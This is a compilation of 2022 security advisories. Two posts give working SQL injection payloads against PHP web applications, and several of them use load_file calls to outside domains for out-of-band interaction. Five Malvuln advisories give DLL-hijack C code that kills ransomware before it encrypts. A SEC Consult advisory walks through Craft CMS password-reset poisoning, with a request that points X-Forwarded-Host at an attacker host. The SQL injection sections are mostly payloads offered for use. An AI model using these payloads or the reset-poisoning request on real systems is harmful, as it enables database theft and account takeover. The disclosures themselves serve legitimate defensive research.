<pre><code>## Title: School Dormitory Management 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.09.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management<br /><br /><br /><br />## Description:<br />The id parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the id parameter, and a database error<br />message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br />The attacker can take administrator accounts control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: id (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: id=2' AND (SELECT 7198 FROM(SELECT<br />COUNT(*),CONCAT(0x716b7a6a71,(SELECT<br />(ELT(7198=7198,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JPhD<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=2' AND (SELECT 6966 FROM (SELECT(SLEEP(5)))amnS)# UIgv<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/hd6xo1)<br /><br /><br /></code></pre>
<pre><code>## Title: Travel Management System 1.0 Multiple SQLi<br />## Author: nu11secur1ty<br />## Date: 05.07.2022<br />## Vendor: https://code-projects.org/author/fabian/<br />## Software: https://code-projects.org/travel-management-system-using-php-source-code/<br />## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28079<br /><br /><br /><br />## Description:<br />The pid, subcatid and catid parameters appear to be vulnerable to SQL<br />injection attacks.<br />The payload '+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'<br />was submitted in the all parameters.<br />This payload injects a SQL sub-queries that call MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator accounts control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: pid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: pid=12'+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''<br />OR NOT 1485=1485 AND 'nTcz'='nTcz<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: pid=12'+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''<br />OR (SELECT 7369 FROM(SELECT COUNT(*),CONCAT(0x716b767671,(SELECT<br />(ELT(7369=7369,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIAM'='OIAM<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: pid=12'+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''<br />AND (SELECT 4768 FROM (SELECT(SLEEP(5)))llcY) AND 'EiGX'='EiGX<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: pid=12'+(select<br />load_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767671,0x5a716d6f4e64696f557a4d784663766d435a634a6d4d434b4b477057454a537a45516d445a77767a,0x717a6b7871),NULL,NULL,NULL#<br />---<br /><br />---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />---<br />Parameter: subcatid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: subcatid=-4598' OR 9251=9251 AND 'kzhS'='kzhS<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: subcatid=7'+(select<br />load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''<br />AND (SELECT 2330 FROM(SELECT COUNT(*),CONCAT(0x717a7a7871,(SELECT<br />(ELT(2330=2330,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Qftm'='Qftm<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: subcatid=7'+(select<br />load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''<br />AND (SELECT 2506 FROM (SELECT(SLEEP(5)))yVKW) AND 'QRSS'='QRSS<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: subcatid=7'+(select<br />load_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a7871,0x4142654745746c4c54786a476756684b7864575669645759754f694d5671586a51506a474a475652,0x716a6b7a71),NULL,NULL,NULL#<br />---<br /><br /><br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />---<br />Parameter: catid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: catid=-9719' OR 2503=2503 AND 'ydxn'='ydxn<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: catid=3'+(select<br />load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''<br />AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT<br />(ELT(9602=9602,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xPSh'='xPSh<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: catid=3'+(select<br />load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''<br />AND (SELECT 1843 FROM (SELECT(SLEEP(5)))XNBw) AND 'KRBS'='KRBS<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: catid=3'+(select<br />load_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''<br />UNION ALL SELECT<br />NULL,CONCAT(0x71786b6a71,0x62596c6a72746a584a7048484a70435867556a656d6e5a734474725650477853527466545071436a,0x7170626b71),NULL,NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/Travel-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/8nroqp)<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/8ed9a60127aee45336102bf12059a850.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Petya<br />Vulnerability: Code Execution<br />Description: Petya looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). The exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Petya<br />Type: PE32<br />MD5: 8ed9a60127aee45336102bf12059a850<br />Vuln ID: MVID-2022-0591<br />Disclosure: 05/06/2022<br />Video PoC URL: https://www.youtube.com/watch?v=p88FI5lZuRQ<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Place the DLL in Windows\System32<br />3) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln <br />//Purpose: Exploit Ransom.Petya<br />//MD5: 8ed9a60127aee45336102bf12059a850<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//compile as x64<br />//gcc -c wow64log.c <br />//gcc -shared -o wow64log.dll wow64log.o <br />//DLL must live under Windows\System32 dir<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/2aea3b217e6a3d08ef684594192cafc8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Cryakl<br />Vulnerability: Code Execution<br />Description: Cryakl looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). The exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Cryakl<br />Type: PE32<br />MD5: 2aea3b217e6a3d08ef684594192cafc8<br />Vuln ID: MVID-2022-0590<br />Disclosure: 05/06/2022<br />Video PoC URL: https://www.youtube.com/watch?v=uI7kr8gFTP4<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Place the DLL in Windows\System32<br />3) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln <br />//Purpose: Exploit Ransom.Cryakl<br />//MD5: 2aea3b217e6a3d08ef684594192cafc8<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//compile as x64<br />//gcc -c wow64log.c <br />//gcc -shared -o wow64log.dll wow64log.o <br />//DLL must live under Windows\System32 dir<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/6152709e741c4d5a5d793d35817b4c3d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Ransom.Radamant<br />Vulnerability: Code Execution<br />Description: Radamant tries to load a DLL named "PROPSYS.dll" and execute a hidden PE file "DirectX.exe" from the AppData\Roaming directory. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Radamant<br />Type: PE32<br />MD5: 6152709e741c4d5a5d793d35817b4c3d<br />Vuln ID: MVID-2022-0589<br />Disclosure: 05/06/2022<br />Video PoC URL: https://www.youtube.com/watch?v=EToGLoZjR6Q<br /><br />Exploit/PoC:<br />1) Compile the following C code as "PROPSYS.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "PROPSYS.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln<br />//Purpose: Exploit Radamant<br />//gcc -c PROPSYS.c -m32<br />//gcc -shared -o PROPSYS.dll PROPSYS.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> <br /> return TRUE;<br />}<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/209a288c68207d57e0ce6e60ebf60729.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.CryptoLocker<br />Vulnerability: Code Execution<br />Description: Cryptolocker drops a PE file in AppData\Roaming directory which then tries to load a DLL named "netapi32.dll". Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. <br />Family: CryptoLocker<br />Type: PE32<br />MD5: 209a288c68207d57e0ce6e60ebf60729<br />Vuln ID: MVID-2022-0588<br />Disclosure: 05/06/2022 <br />Video PoC URL: https://www.youtube.com/watch?v=sAp024n_dSk<br /><br />Exploit/PoC:<br />1) Compile the following C code as "netapi32.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln - 5/6/2022<br />//Purpose: Exploit CryptoLocker<br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220505-0 ><br />=======================================================================<br /> title: Password Reset Poisoning Attack<br /> product: Craft CMS<br /> vulnerable version: 3.7.36 and potentially lower<br /> fixed version: none, see workaround by vendor<br /> CVE number: CVE-2022-29933<br /> impact: high<br /> homepage: https://craftcms.com<br /> found: 2022-03-14<br /> by: Sandro Einfeldt (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Craft is a flexible, user-friendly CMS for creating custom digital<br />experiences on the web and beyond.<br /><br />It features:<br /><br />- An intuitive, user-friendly control panel for content creation and<br /> administrative tasks.<br />- A clean-slate approach to content modeling and front-end development<br /> that doesn’t make any assumptions about your content or how it should be<br /> consumed.<br />- A built-in Plugin Store with hundreds of free and commercial plugins,<br /> all just a click away.<br />- A robust framework for module and plugin development.<br />- An active, vibrant community."<br /><br />Source: https://craftcms.com/docs/3.x/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor responded that the vulnerability will not be fixed as a workaround<br />is available.<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, as the software may be affected from further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Password Reset Poisoning Attack (CVE-2022-29933)<br />The password reset function of the Craft CMS backend login page,<br />usually accessible under https://<hostname>/index.php?p=admin/login,<br />is vulnerable to a password reset poisoning attack. An unauthenticated<br />attacker who knows valid email addresses or account names of Craft CMS<br />backend users is able to manipulate the password reset functionality in<br />a way that the registered users of the CMS receive password reset emails<br />containing a malicious password reset link.<br /><br />The link contains valid (secret) tokens in the URL's GET parameters that<br />are necessary to authenticate against the server's password reset function<br />and enable a user who lost or forgot the account's password to reset the<br />password. By manipulating the password reset request, an attacker is able to<br />set an arbitrary hostname in the resulting password reset link. Thereby, the<br />attacker can set the link to point to an attacker-controlled host.<br />If a user clicks on the reset link, the valid reset tokens in the GET<br />parameters will be sent to the attacker's web server and can be<br />extracted from the server logs. The attacker is able to build a valid<br />password reset link by adding the tokens to the general reset link<br />structure:<br /><br />https://<hostname>/index.php?p=admin/set-password&code=<token1>&id=<token2><br /><br />If the attacker calls the filled out URL with a web browser, the<br />attacker will be able to reset the account's password and log in.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Password Reset Poisoning Attack (CVE-2022-29933)<br />First, the attacker needs to browse the following URL:<br /><br />https://<hostname>/index.php?p=admin/login<br /><br />The login mask contains a link "Forgot your password?". Following this<br />link, the attacker gets prompted to submit a valid account name or email<br />address. After entering the account name or email address and pressing<br />the "Reset Password" button, the attacker can intercept the resulting<br />HTTP POST request with an intercepting web proxy (e.g. BurpSuite). The<br />intercepted request can then be manipulated before getting forwarded<br />to the server. The attacker needs to add the HTTP header<br /><br />X-Forwarded-Host: <attacker_host><br /><br />while the value should contain the hostname of the webserver under the<br />attacker's control.<br /><br />Manipulated Request:<br />-------------------------------------------------------------------------------<br />POST /index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1<br />Host: <IP><br />X-Forwarded-Host: www.attacker.com<br />[...]<br />Referer: http://<IP>/index.php?p=admin/login<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Registered-Asset-Bundles: ,craft\web\assets\login\[...]<br />X-Registered-Js-Files: ,http://<IP>/cpresources/[...]<br />X-CSRF-Token: c9kEDPROifmFNKSKhght_JgkBgnnk5EfXiH1qHA[...]<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 38<br />Origin: http://<IP><br />Connection: close<br />Cookie: CRAFT_CSRF_TOKEN=[...]<br /><br />loginName=test%40example.com<br />-------------------------------------------------------------------------------<br /><br />The resulting server response indicates that the request has been processed.<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Mon, 14 Mar 2022 08:19:24 GMT<br />[...]<br />X-Powered-By: Craft CMS<br />Content-Length: 16<br />Connection: close<br />Content-Type: application/json; charset=UTF-8<br /><br />{"success":true}<br />-------------------------------------------------------------------------------<br /><br />The user will then receive a malicious password reset email pointing to the<br />hostname that the attacker provided by adding the X-Forwarded-Host header.<br /><br />Email:<br />-------------------------------------------------------------------------------<br />Hey Test,<br /><br />To reset your Test Install password, click on this link:<br /><br />http://www.attacker.com/index.php?p=admin/set-password&code=D6HWm7pGpYEt9mb-mPVh4kGzXWZ8ax5u&id=48b9fe48-91c9-430e-baa2-5bdf66c88102<br /><br />If you were not expecting this email, just ignore it.<br />-------------------------------------------------------------------------------<br /><br />If the user is not aware and clicks on the link, the values of the reset tokens<br />"code" and "id" will be sent to the attacker's web server. The attacker is<br />then able to relay the tokens to the original reset endpoint and reset the<br />password.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* 3.7.36<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-03-10: Contacting vendor through contact form.<br />2022-03-14: Vendor provides Craft CMS installation for verifying the vulnerability.<br />2022-03-22: SEC Consult provides the vulnerability advisory through contact form.<br />2022-03-23: Vendor responded that there is a hardening measure available.<br />2022-03-31: SEC Consult replied that all installations of the current version<br /> (including the testing instance provided by the vendor) are vulnerable<br /> by default and the vulnerability is implementation-based and results<br /> from bad coding practices.<br />Until 2022-05-02: No answer from vendor.<br />2022-05-03: Set advisory release date to 5th May. Informing vendor about<br /> scheduled advisory release.<br />2022-05-05: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor knows about the vulnerability and the resulting risks. A possible<br />hardening measure has to be implemented manually and is documented here:<br />https://craftcms.com/knowledge-base/securing-craft#explicitly-set-the-web-alias-for-the-site<br />https://craftcms.com/docs/3.x/sites.html#site-url<br /><br />The vendor responded that the vulnerability will not be fixed as a workaround<br />is available.<br /><br /><br />Workaround:<br />-----------<br />The backend login interface and the password reset function should not be<br />accessible from the internet or from any unknown IP addresses. The user<br />must implement the workaround described in the hardening guide above in order<br />to mitigate this issue.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Einfeldt / @2022<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/de25f04dedaffde1be47ef26dc9a8176.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.CTBLocker<br />Vulnerability: Code Execution<br />Description: CTBLocker looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: CTBLocker<br />Type: PE32<br />MD5: de25f04dedaffde1be47ef26dc9a8176<br />Vuln ID: MVID-2022-0586<br />Disclosure: 05/05/2022<br />Video PoC URL: https://www.youtube.com/watch?v=koXDYNI5ngQ<br /><br /><br />Exploit/PoC:<br />1) Compile the following C code as "SHFOLDER.DLL" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "SHFOLDER.DLL"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln - 5/5/2022<br />//Purpose: <br />//gcc -c SHFOLDER.c -m32<br />//gcc -shared -o SHFOLDER.DLL SHFOLDER.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>
